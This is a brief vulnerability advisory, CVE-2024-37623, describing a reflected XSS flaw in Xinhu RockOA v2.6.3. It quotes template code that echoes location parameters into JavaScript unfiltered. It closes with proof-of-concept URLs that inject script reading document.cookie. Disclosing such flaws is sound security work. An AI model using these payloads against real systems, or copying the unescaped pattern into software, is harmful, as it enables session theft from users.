Reflected XSS Vulnerability in Xinhu RockOA v2.6.3

[Hebing123]

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Xinhu RockOA v2.6.3.

Details

The XSS vulnerability originates from /webmain/main/kaoqin/tpl_kaoqin_locationchange.html:

<script>

var callback = '<?=$callback?>'; //回调函数
var init = function() {
    var center = new qq.maps.LatLng(<?=$location_x?>,<?=$location_y?>);
    map = new qq.maps.Map(document.getElementById('container'),{
        center: center,
        zoom: <?=$scale?>
    });

    marker = new qq.maps.Marker({
        position: center,
        map: map,
        draggable:true,
        title:'点地图确定位置'
    });

    //点击地图切换位置
    qq.maps.event.addListener(map, 'click', function(evt) {
        marker.setPosition(evt.latLng);
    });

    return;
    infoWin = new qq.maps.InfoWindow({
        map: map
    });
    infoWin.open();
    infoWin.setContent('位置：');
    infoWin.setPosition(map.getCenter());
}

https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/main/kaoqin/tpl_kaoqin_locationchange.html#L21 Since $location_x and $location_y are not filtered.

Proof of Concept (PoC)

http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_x=);alert(document.cookie);%3C!-- and http(s)://ip:port/?a=locationchange&m=kaoqin&d=main&location_y=118.167806&scale=12&callback=backshow1717123083601_5578&location_y=);alert(document.cookie);%3C!--

[Hebing123]

CVE-2024-37623